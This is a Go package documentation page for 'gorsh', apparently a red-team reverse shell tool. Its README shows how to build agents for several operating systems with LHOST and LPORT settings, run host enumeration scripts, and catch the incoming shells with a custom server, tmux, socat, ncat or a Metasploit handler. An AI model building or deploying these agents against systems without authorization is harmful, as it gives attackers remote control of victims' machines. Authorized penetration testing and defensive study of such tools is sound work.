gorsh

module

v0.0.0-...-2e7ada4 Latest Latest Go to latest Published: Jan 29, 2022 License: GPL-3.0

Details

Valid go.mod file

The Go module system was introduced in Go 1.11 and is the official dependency management solution for Go.
Redistributable license

Redistributable licenses place minimal restrictions on how software can be used, modified, and redistributed.
Tagged version

Modules with tagged versions give importers more predictable builds.
Stable version

When a project reaches major version v1 it is considered stable.
Learn more about best practices

Repository

github.com/audibleblink/gorsh

README ¶

gorsh

[go]lang [r]everse [sh]ell

Originally forked from - sysdream/hershell

Fork Changes

Requires go1.16+

See the Changelog

Getting started

git clone git@github.com:audibleblink/gorsh.git

Using the zstd build tag and windll make target require cgo. Make sure you're familiar with cross-compilation and cgo and have the toolchains for it, or read here if you're feeling adventurous.

Usage

Create internal/sshocks/conf/ssh.json. There's an example in that same directory for reference.

Follow the make command's printed instructions on creating an ssh user for the reverse proxy connection.

Generate agents with:

# For the `make` targets, you only need the`LHOST`and`LPORT`environment variables.
$ make {windows,macos,linux} LHOST=example.com LPORT=443

Enumeration Scripts

The enum command will present a selection dialog that allows once to run enumeration scripts based on the host OS. You can update scripts in scripts/prepare_enum_scripts.sh and run make enumscripts. Addition of scripts will require modification of ./internal/enum/enum_{windows,linux}.go

Catching the shell

This project ships with a server that catches the reverse shell and still provides shell-like capabilities you lose with traditional reverse shells, including:

Tab Completion
Vi-mode readline editing
History
Cursor movements

Generate the server with:

make server
build/srv/gorsh-server --help

The gorsh and gorsh-server have a one-to-one relationship, like a traditional shell. For multiple shells, you need to start multiple servers on different ports. Unless...

To have the ability to receive multiple shells on the same port, there's the make listen target. The make listen target kicks off a socat TLS pipe and creates new tmux windows with each new incoming connection. Feed it a port number as PORT. socat is essentially acting as a TLS-terminating reverse proxy. The incoming connections are then handed off to gorsh-server through randomly generated Unix Domain Sockets.

make listen PORT=8080

# once a client connects, on a different terminal type:
tmux attach -t GORSH

Shells can also be caught without tmux or gorsh-server using:

socat (not working on macos)
ncat
openssl server module
metasploit multi handler (with a python/shell_reverse_tcp_ssl payload)

Examples

$ ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 1234
$ socat stdio OPENSSL-LISTEN:443,cert=server.pem,key=server.key,verify=0

Credits

Initial Work - @lesnuages
Modifications - f47h3r - @f47h3r_b0
@mzpqnxow for figuring out my x-compilation and dependancy problems and troubleshooting guide
Enumeration scripts courtesy of @411hall @harmj0y @rebootuser

Directories ¶

Path	Synopsis
cmd
gorsh
gorsh-dll
gorsh-server
internal
cmds
core
directory
enum
fetch
meterpreter
myconn
shell
sitrep
sshocks
utils
zip

?	: This menu
/	: Search site
f or F	: Jump to
y or Y	: Canonical URL